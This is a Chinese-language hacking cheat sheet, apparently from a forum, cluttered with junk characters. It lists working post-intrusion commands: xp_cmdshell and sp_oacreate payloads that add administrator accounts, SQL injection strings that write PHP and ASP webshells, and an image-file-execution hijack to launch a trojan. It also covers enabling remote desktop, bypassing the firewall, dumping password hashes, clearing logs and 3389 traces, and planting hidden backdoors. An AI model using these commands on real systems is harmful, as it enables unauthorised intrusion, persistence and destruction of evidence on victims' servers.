* D0 {4 s% U9 j' B
1.net user administrator /passwordreq:no
6 }& O( l9 K% S3 Y. z这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了: ^( q" p: R' `. }. m
2.比较巧妙的建克隆号的步骤% m, G5 |3 c9 @, r3 n
先建一个user的用户
' u$ }* X% p8 [2 K然后导出注册表。然后在计算机管理里删掉
4 e/ B( D' n+ m$ v在导入,在添加为管理员组
& S3 h7 h! c1 Y+ J* W1 G, Z3.查radmin密码 @' u9 ^) |' g- ^9 g
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg
+ t+ `0 [, y- M4 w6 ]- X W4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]
3 u7 g, j2 r/ Y2 V建立一个"services.exe"的项6 c; t7 l* c- K# J. I' c
再在其下面建立(字符串值)+ |1 A5 q) X3 D, \
键值为mu ma的全路径
& |9 g: z3 m& W/ B5.runas /user:guest cmd
: k3 D6 p4 E! m( N) N测试用户权限!' Z$ j6 d# p5 z3 V9 {5 j3 q% g
6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?: u5 I7 s9 p( m8 C N1 N
7.入侵后漏洞修补、痕迹清理,后门置放:
- X: C6 @4 v3 z基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门
9 t* l# ?! g- D7 h5 y3 y8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c* a1 E. `3 V8 p
: k4 f% O a/ N% g
for example( ~1 y5 \# Q4 r. [$ y% s
* K$ O3 K. w' v% \& edeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'
|# q r, f3 B4 r6 ~0 y6 U8 t8 ?
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'
4 K/ D: h. c3 V6 s' m4 e4 S: L! {# x+ _0 u7 J& ^
9:MSSQL SERVER 2005默认把xpcmdshell 给ON了
% @. i0 n$ @+ O如果要启用的话就必须把他加到高级用户模式
& e; ^1 x+ y3 k& v1 y" ]3 ^- K9 _可以直接在注入点那里直接注入
) _1 e3 P5 J; Mid=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--. r' ]0 N1 S5 j' T
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
) V" B% G9 W2 x* @2 A0 `0 o" ~或者
+ k& X( c# s& F/ p6 }2 i0 esp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
6 M* ^$ c4 a8 X% d+ L5 u来恢复cmdshell。& p- ~ ]9 m" W
2 m- f2 i2 ^& c" S4 O; R; X1 `9 f分析器; [, O! N* w# Y" ~7 ? B
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
' p% }1 O. H# ?$ N' |+ @& p/ k然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll"). p9 d9 N2 k. m# p
10.xp_cmdshell新的恢复办法, `% K, Q4 Q, `$ b8 Z
xp_cmdshell新的恢复办法
& V3 P+ U& ]- Z扩展储存过程被删除以后可以有很简单的办法恢复:. B. Y. |/ C! d( L
删除; ]& a: l8 N5 A5 l+ }
drop procedure sp_addextendedproc
6 b8 D G% }1 Z& i3 Gdrop procedure sp_oacreate* l% Q3 G0 i! @' E: M1 H: g. N" k
exec sp_dropextendedproc 'xp_cmdshell'
: }& l* f5 b$ S9 [; {" H: w
/ ]5 g5 v5 V: F, x& Q9 m恢复
: u" d/ D* o+ v; W' sdbcc addextendedproc ("sp_oacreate","odsole70.dll")
3 [ G6 a0 ]' s @7 I: Ydbcc addextendedproc ("xp_cmdshell","xplog70.dll")- O$ N( L* S4 {5 `5 Y7 N
' n# U) _" E) G, ~9 O
这样可以直接恢复,不用去管sp_addextendedproc是不是存在* e; s4 Y. c; l, _
8 z9 ?! b4 o) S
-----------------------------
0 u* u8 I3 x9 F4 F) m
! \0 {$ F- b" y& @' P删除扩展存储过过程xp_cmdshell的语句:
$ j6 T0 ]- z% n1 ]4 {0 Aexec sp_dropextendedproc 'xp_cmdshell'' P, M9 ^+ N! d& O9 @# J" @# U1 j O E
! @5 N' f& H1 F4 j2 d: v0 s恢复cmdshell的sql语句
: o5 h; _& ~& V. E: \, S3 rexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
2 U$ H$ ]0 f, _% z6 j7 S! ?
, W; u3 w+ r5 q6 c3 j4 h- Q+ n
2 c2 {" b( u$ N6 d+ G4 f0 H( n开启cmdshell的sql语句
" R9 L$ s0 J1 v& c- R: J
, V* Y5 l. h _5 ^2 ^exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
6 \5 G0 L/ V$ C s- ?) J1 D- i/ {, a6 `
判断存储扩展是否存在
/ ^' ^ F2 v' M- Uselect count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
: }) u8 O1 w# w3 n4 U+ f3 e返回结果为1就ok
: d( z0 C- W% g7 _
7 c2 @, p! p5 S恢复xp_cmdshell7 E# V: F# Q# Q( o7 P& `9 o' ]
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
, h( b, w1 ^9 z& B* B返回结果为1就ok
6 l' X2 d* l3 [1 m: M3 A' e! l0 |& m$ J' K& k
否则上传xplog7.0.dll( m+ Y) Y; j+ @2 t9 o
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'6 Y' L5 L& Q. J: Q+ v! [
$ @" C$ c: x# W8 m( i) e$ B4 h# O& @3 K
堵上cmdshell的sql语句
* k1 s1 L! }' S4 Qsp_dropextendedproc "xp_cmdshel, h& w. J$ \1 V8 g4 n8 _
-------------------------- S0 J7 ^1 p b
清除3389的登录记录用一条系统自带的命令:, Y* L" B. P4 u |
reg delete "hkcu\Software\Microsoft\Terminal Server Client" /f
U8 P% x/ P- a0 L/ x9 c0 ?# G0 P
然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件- U6 U- N+ j4 R& M4 i; h
在 mysql里查看当前用户的权限2 u: a0 Y4 t% z% ]. |) D, T
show grants for 0 w. ?$ k& C# D7 X% `- m& Y
/ p, Y3 `5 s6 g: c以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。$ G" W9 I0 t/ T4 `& j/ K
! p" s1 L3 p# U3 B* q
( Z4 r6 E* L( H* q1 GCreate USER 'itpro'@'%' IDENTIFIED BY '123';
# F' O: [; }4 J. f M. b/ T5 Z8 y- W, F) _) ]" n# x) N
GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION
0 t9 o8 a+ ?1 F- d- R
1 {8 o/ z2 J R) _: g8 P: {& cMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
( ?3 J" k% ^: G0 n7 `9 {
, ?! b |( D/ |3 W# r! e; |MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
" N, M7 ` T/ O
, X0 [1 {/ ]; a. {/ Q% ~搞完事记得删除脚印哟。% o4 v" q2 j4 P* s' ~# _
/ @3 w1 a0 ]7 V
Drop USER 'itpro'@'%';5 T$ B6 i. M$ l2 e5 `+ {
2 n% z8 j9 `" r! J; X8 T' kDrop DATABASE IF EXISTS `itpro` ;; y. X8 T0 C" v. n
3 o/ q$ Y0 c2 |0 Y Y当前用户获取system权限! {' e' g: ]8 \% z Q* h' B
sc Create SuperCMD binPath= "cmd /K start" type= own type= interact
' c k" }# Y5 r- H+ a7 Wsc start SuperCMD& m: L0 h; C: N2 {0 x/ ~3 i
程序代码5 L( t$ S3 u7 J
<SCRIPT LANGUAGE="VBScript"> A# b" h* d6 g5 ~
set wsnetwork=CreateObject("WSCRIPT.NETWORK"): N& \. x8 R5 S
os="WinNT://"&wsnetwork.ComputerName
% Q5 f5 y L4 x6 cSet ob=GetObject(os)
" i! @. x! v# MSet oe=GetObject(os&"/Administrators,group")+ M0 F8 O* z2 X" l' c) R* l0 _
Set od=ob.Create("user","nosec")" A9 U6 g4 S1 h
od.SetPassword "123456abc!@#"
& g: n3 E4 d' q0 D! }0 bod.SetInfo% v6 d7 v9 Z/ Y- M" O) v) W
Set of=GetObject(os&"/nosec",user)0 i7 z g7 X' r6 W
oe.add os&"/nosec"- `3 R2 r! g# p6 ^7 _2 s
</Script>
: S ]* r4 A9 _8 ~ \* h<script language=javascript>window.close();</script>0 q" ^" C; Z7 [4 @& e
# T% j( b" u1 b3 ]# ]2 ]6 c( A, C& q9 g
: f( x. [; G6 L3 }/ B7 R \
; j( r- i; O, i6 f; W突破验证码限制入后台拿shell3 ^" @4 t b: I
程序代码+ g3 H/ I$ x$ I/ r5 P
REGEDIT4
0 w9 h7 B# W+ u9 U[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security] 3 p9 j* d4 L: u/ i" n% k9 i
"BlockXBM"=dword:000000003 G A. i5 D2 ]% O* _
: ~8 K) I- t$ j
保存为code.reg,导入注册表,重器IE
- E4 N+ `7 @" L. M! B就可以了( s! @ b/ F: w! m
union写马& e3 ?$ _7 a, t9 n' K7 [; y
程序代码2 g2 P9 j- ?6 H; w/ c
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*
% Q6 f* f% }( k# m F; ~4 @% {8 M6 x" D$ n( W. r3 A/ O
应用在dedecms注射漏洞上,无后台写马: K1 X4 }" N+ A1 D1 x/ z
dedecms后台,无文件管理器,没有outfile权限的时候
; K7 N# V; M1 @" U在插件管理-病毒扫描里
4 J4 X7 n5 r( G" E! i6 k写一句话进include/config_hand.php里 L/ S5 {# n4 [. D5 W
程序代码5 U2 H' q4 `: a# {3 n
>';?><?php @eval($_POST[cmd]);?>
4 G$ ^ F. Y" K o3 g5 T6 e# |2 ~6 `. J* D X! |
- D, C3 c+ E" k T$ ~- ^
如上格式3 {# H& U* j: U7 i; q# G; W7 p4 g& M
: f5 t$ ^3 F- j: W! joracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解
- ]1 b8 u T! J6 {程序代码
7 I* m/ T6 {5 P! F; Y# k$ lselect username,password from dba_users;
" q& E9 B, j: M6 a" t* G, |9 z3 K6 x
$ \0 n& N3 j, e$ G# _
mysql远程连接用户
5 _' H. v- t) N. z0 j程序代码' @4 D/ b9 f3 S
5 s6 A5 k( b. |Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme';
4 b% |! i0 C6 {1 E$ t% aGRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION/ Y, o/ p- z/ x6 Q. M1 B# x
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0* @/ b/ j k5 L: n# S
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;4 A9 G8 V7 r( v4 W, ], j1 B0 z
( R% v8 b4 B& e3 o/ g( z! {/ X0 h+ W7 s" p2 E) |( p
# v; M6 @& m V( {. x' z5 t$ O# K
: _* Q# C- @ ^- z/ yecho y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0/ v, d, J0 C( r
+ J0 m+ D8 [& F. k7 t
1.查询终端端口# j) Y x. V3 x! N9 h
|* _) y# I( A7 o+ A! [" x
xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber% E: h6 r5 q0 ?8 @7 f3 Q$ b, ^
3 L! v) @0 E+ |" M
通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
4 p! D( h' \, u' ]type tsp.reg
2 b9 a' q1 N, L- I8 z$ [5 I1 Y% O9 _0 P9 p! [6 }% j+ X9 |
2.开启XP&2003终端服务9 d8 h! ^% ~: y( V' v+ C
0 }+ v! X" K: V5 t W# H# R J5 J+ L. T# ]
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f4 d; I3 W2 j* Z2 l
0 v* H6 p2 G" u4 `% I, i) V
7 |' M0 K' R( K; y) I( o! G8 C0 s* o( S
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
2 E; ~. {4 b: ~2 I# W, u& S6 d& d" x6 w. r- W E. k
3.更改终端端口为20008(0x4E28)" c( g% t( Y9 s. p9 T/ O
# u9 x6 z' x( W% \9 [, cREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
$ f {+ Q- V% @7 Y2 e+ c
7 s4 u. P9 Y% QREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f& t& i- P; J/ w1 C: m
4 t9 D1 ?0 u. Z/ ?/ Z( Y
4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制$ h# ~" _# A9 u( y; a
: j9 F$ f6 ~3 n- {$ W. H r1 aREG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f
' _5 x4 k( l( d# t$ V: Y% A( N+ c' }1 ^
0 u K9 f& q; e5 q' e2 Q5.开启Win2000的终端,端口为3389(需重启) [' d: T+ X/ i2 y
) @# n, m) J. O! ^
echo Windows Registry Editor Version 5.00 >2000.reg 5 W8 c2 j, V" i6 }3 t; @
echo. >>2000.reg3 O; F# k3 Q$ Y4 ^$ C; ^
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
# }4 {: O. [; Y# v( r+ Eecho "Enabled"="0" >>2000.reg
/ n$ E" u$ P* v6 ^# P! P# {echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
2 _) o6 U; G+ n$ K) P) z3 {echo "ShutdownWithoutLogon"="0" >>2000.reg
& x& C8 x; S9 Secho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg 2 L+ m4 R9 v2 i4 @0 O: `4 W( [
echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg
3 P" m+ |+ T% H$ j* Necho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg 7 I' N0 U+ H) j0 `( j; u8 y
echo "TSEnabled"=dword:00000001 >>2000.reg $ h( m: j7 a0 b9 R
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg 4 j! x! Q% z5 M0 |
echo "Start"=dword:00000002 >>2000.reg
/ E' p9 W' q5 s+ D8 T7 X4 \echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg + N- v' p" n+ l# e
echo "Start"=dword:00000002 >>2000.reg [7 V- x2 S/ ?. Y! b7 o
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg 4 ?8 J3 M$ y) H
echo "Hotkey"="1" >>2000.reg - `, d4 W- F3 f6 B7 c
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg . ^: K" S3 Z# N% s [4 H
echo "ortNumber"=dword:00000D3D >>2000.reg
% F/ w2 G+ {( r- ?& Gecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg B2 D2 p# ]5 \
echo "ortNumber"=dword:00000D3D >>2000.reg( E! C+ k6 ^4 v& k
e5 t; q: V y9 V" }* P
6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)7 r: m2 `/ Q" }* c
^2 x0 y" U# N; `& W( B@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
' L& X# c- U: K Y4 d( q. M(set inf=InstallHinfSection DefaultInstall); ~9 a6 f8 n2 r% o9 f+ w) q2 h
echo signature=$chicago$ >> restart.inf
% @( r, @5 V0 A" T6 l5 i" \, Eecho [defaultinstall] >> restart.inf# W- K4 W# d' h5 ?
rundll32 setupapi,%inf% 1 %temp%\restart.inf, y) v- Y5 X$ @0 Q; X- H& ?
- U3 v! |3 u$ p! y7 ?3 i
' D0 s/ A1 V/ A4 F& F7.禁用TCP/IP端口筛选 (需重启)' N6 P5 C; l7 A9 M" d
& B2 x$ k k9 x' r9 kREG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
, x9 L0 U# T/ p7 |2 A( V9 h3 o+ Y1 N9 t8 ~4 A0 C5 V
8.终端超出最大连接数时可用下面的命令来连接
& U A2 y& k9 c1 _- g% f0 N5 I
( l1 j+ A! a7 B* Q5 t# Q+ ]mstsc /v:ip:3389 /console2 |2 m3 s4 ^, e, ?) j
4 \, A5 o: U3 K+ x% q4 R9.调整NTFS分区权限
+ O+ K; E# _/ }& Q' L4 q, B/ s$ m5 p* F
cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)1 E6 X: S0 G" T5 l
/ t, o* j" g! E A" ecacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)) Z; S _1 u6 l6 O/ A
9 G I# i6 v$ T
------------------------------------------------------
" I# G8 A; U: _9 B3389.vbs
6 m' g4 [% R$ k2 V+ z. f1 SOn Error Resume Next* a ?/ O, a! Z8 ]* I
const HKEY_LOCAL_MACHINE = &H80000002+ a% v- n4 D% x. x- n
strComputer = "."1 z5 y9 U6 v% J
Set StdOut = WScript.StdOut
@$ ~5 H( q/ B# _( `4 Q' VSet oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_! p7 }9 X" `0 b' }' l0 s- S
strComputer & "\root\default:StdRegProv")
7 b5 q* M1 H1 o3 p( | {2 H2 s! d* OstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"+ X. a, s6 j' g/ R
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath( K. _( {" Z+ G! S3 o9 ~7 z
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
% t6 E H: ` L) _5 noreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath5 a, X0 {" q2 Q( N
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
0 r& y! n( C9 q+ h+ A/ jstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
6 N4 c. U0 A, g& c3 I1 JstrValueName = "fDenyTSConnections"
" W/ c6 j" G: D$ sdwValue = 0 P3 D. b; l2 @; l1 @
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue3 @- u& a' S6 Y: Y n
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
1 u0 q f' s; Z7 _& M' l- RstrValueName = "ortNumber"
7 t# a+ y/ ^& H5 U; z P8 @4 p( |dwValue = 33898 ` P; p& L" _8 t
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue' J: W9 n6 o6 p, S' w5 n. v
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"/ p. h1 {5 {+ L) f! w) A
strValueName = "ortNumber"
- Y9 \( B. ~/ U) Z6 | Y$ F3 ~ E1 YdwValue = 33897 y; n( W7 B$ l k
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue! ~$ p2 w6 d6 L! q+ `
Set R = CreateObject("WScript.Shell")
2 `1 r8 X8 _- P3 \6 I2 b. {# PR.run("Shutdown.exe -f -r -t 0")
! M) E q/ c5 F2 A8 Q1 b+ P% H z/ o* o/ Y
删除awgina.dll的注册表键值
! t4 D# p: l% ^! X# R程序代码, o1 `; a2 l5 O: I
" S/ _! y0 D/ g" preg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f
" l; C5 e9 O9 c, q. o( Q, Q6 T" H G; {
! t: N6 k0 z2 G0 O @( @, T" Y3 e. ~- J7 s5 l: R
2 u1 O; [- W8 z) R8 i' E/ f: H8 N1 F. B程序代码. K9 N# z$ H3 _
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash
$ W8 H: f' A7 z5 h' w) p5 r% C M- a1 X" K* l
设置为1,关闭LM Hash- @; O M' F) ~8 `
4 D! a. L6 e% G
数据库安全:入侵Oracle数据库常用操作命令& f7 K- n+ A7 X. z& ]4 C' {5 a: `; ^( O
最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。
) z* ^9 ?' i1 k& a6 k1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。
: I4 O$ ]3 t% R2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
4 I8 N2 Z' `6 @& X3、SQL>connect / as sysdba ;(as sysoper)或6 ?' [0 R7 B/ N [2 u
connect internal/oracle AS SYSDBA ;(scott/tiger)- P9 F1 {( j1 W- y @# u2 X
conn sys/change_on_install as sysdba; _0 B9 m; T% `
4、SQL>startup; 启动数据库实例
1 n+ { U0 i% [5 s5、查看当前的所有数据库: select * from v$database;3 D& `8 j8 i1 _2 A& n" g/ P
select name from v$database;
1 R2 g4 I7 A9 ]+ ?6、desc v$databases; 查看数据库结构字段 s+ B# r- J0 s, P% v6 p" Y( b
7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:
' l: i2 }: F6 E, ^SQL>select * from V_$PWFILE_USERS;
0 n, N2 l3 `5 w0 S. lShow user;查看当前数据库连接用户8 {" m& s3 ]& m: I
8、进入test数据库:database test;3 e3 e# T. h) O) g, a J0 ^7 ^
9、查看所有的数据库实例:select * from v$instance;9 l3 q1 L1 U& i8 A* u& `9 R
如:ora9i; ^* U1 _. e* [ K
10、查看当前库的所有数据表:! h% M7 n7 l+ m
SQL> select TABLE_NAME from all_tables;
9 C5 G9 B+ _" _5 ?) M4 uselect * from all_tables;
8 m @. n: p' Y( f0 WSQL> select table_name from all_tables where table_name like '%u%';2 Y/ {3 H: }. u8 h0 z7 F6 T
TABLE_NAME
8 p/ N) a* M5 D& P------------------------------# W* B8 a* v/ s9 |
_default_auditing_options_
0 \! O8 P4 y$ H: [11、查看表结构:desc all_tables;+ \' a% I8 n5 p7 n$ ]) B1 Y
12、显示CQI.T_BBS_XUSER的所有字段结构:9 c+ H3 f, I, p$ u* |
desc CQI.T_BBS_XUSER;
0 W5 G9 j1 i+ K6 p! r! @13、获得CQI.T_BBS_XUSER表中的记录:
, [" ~, Z) z( Pselect * from CQI.T_BBS_XUSER;% Z& k; t" @9 ]5 H
14、增加数据库用户:(test11/test)
+ M; `- `" o& o9 ~: I4 ocreate user test11 identified by test default tablespace users Temporary TABLESPACE Temp;5 R8 a' Y! I- P6 a6 M2 U" x7 v
15、用户授权:
. N# r5 a& a! y: X1 N( ~grant connect,resource,dba to test11;) F9 v! e1 G& b6 B5 P# Z) j* C
grant sysdba to test11;
! z/ H" D2 I$ U6 P) Lcommit;/ S; g6 p- s* j+ v$ x$ f8 U3 ]
16、更改数据库用户的密码:(将sys与system的密码改为test.)" {: Q3 a9 E- \7 i3 G) R( l
alter user sys indentified by test;
3 }+ Q% \6 T: u& kalter user system indentified by test;
% ^3 r! t/ t" b& v# V: o! i6 M* _& g5 M: R4 g! ?
applicationContext-util.xml
, P+ Y' _! g% [% R! r5 d. V" YapplicationContext.xml7 Q) H1 y1 u, ~2 k' `- j K- t
struts-config.xml
6 _# _! D. M2 d7 o/ a- ~web.xml7 Q7 O6 q& c: ^& d" V1 N
server.xml+ `% W3 Z4 `7 H" x
tomcat-users.xml* h7 S, ]( g$ C' z+ E# O. m
hibernate.cfg.xml
1 B/ L* U' o% ~/ s U; Z3 Pdatabase_pool_config.xml- Y# S/ H! p6 L9 l' W$ z8 f- K, T
% \, u6 v4 f. K0 g5 B* Z. e' v: a4 M( Y' z
\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置 d) C: R. x+ [* g
\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini% z8 J6 m. V# g# b1 y# P9 q
\WEB-INF\struts-config.xml 文件目录结构+ `9 u' J/ }0 g2 I
5 ?3 u/ [; _! Q% }+ ~! qspring.properties 里边包含hibernate.cfg.xml的名称0 M, ], G4 q$ C
: g5 m( L; T. n2 W$ b; F: S
$ m6 r& U$ r. U! Z. \4 |2 ?C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml' x, K: }% I9 t9 a* m R" o* ~0 {; x
7 c: j% u4 I/ F; @* e* ^% r如果都找不到 那就看看class文件吧。。5 f5 W* L6 y! Z4 [8 c6 `
7 V! x4 J! L2 k, u% V
测试1:7 r3 ?5 P: d+ e1 `
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
# f5 S' q' L0 c! e
. I! I; L# C9 G测试2:
" ~6 w9 a" U' g- b2 K3 T z8 S, w& Z! O7 ~" N ]! v% X: W
create table dirs(paths varchar(100),paths1 varchar(100), id int); E B; p' T8 G
8 k# I0 x0 T1 ]/ bdelete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
+ R# g7 Y; _2 o( A/ i
8 k8 y! y6 n* z4 j% s$ eSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
0 d& k# h( K# r! o: n) R# p! n3 K) y) h# s
查看虚拟机中的共享文件:
2 U: T! u+ v! X' e) V, C在虚拟机中的cmd中执行5 q: m; |' r! {' \; [4 R
\\.host\Shared Folders8 v" w& N: {* m( w, m' k r
$ q/ f) u/ W6 }- l, P9 ? f$ |' bcmdshell下找终端的技巧
9 m }9 {; ^: t4 x: Z找终端:
5 _# |- p$ W/ j2 @; L9 J( r第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值!
' h8 f5 i/ d/ |2 r0 C- V 而终端所对应的服务名为:TermService
! _% i6 k, k' d& C第二步:用netstat -ano命令,列出所有端口对应的PID值!
6 o5 Q& R; ], T( q7 _ 找到PID值所对应的端口4 t Q8 F4 p, A
) U `3 ?4 {( n9 G/ K0 h查询sql server 2005中的密码hash
7 V: l( r6 ^. y0 B# lSELECT password_hash FROM sys.sql_logins where name='sa'
3 ~0 i2 U* X) o! z: U" `SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a9 [8 ?/ x; P1 {* ]0 {9 W' F; Q5 T
access中导出shell
' u+ l: \ v" h0 p9 N( P' p/ c( u/ J' q
中文版本操作系统中针对mysql添加用户完整代码:
7 _% c9 e& B2 f1 y1 C
& f* N0 F n! j( K( Cuse test;$ C5 h; {/ M# t4 P" H
create table a (cmd text);
8 T( S0 L7 X+ w! L4 ]; Y( t& Y7 ~9 ainsert into a values ("set wshshell=createobject (""wscript.shell"") " );! y/ w" a$ e c
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );8 y; \4 p) W# J
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
; B1 E" c5 X2 x) r! Xselect * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
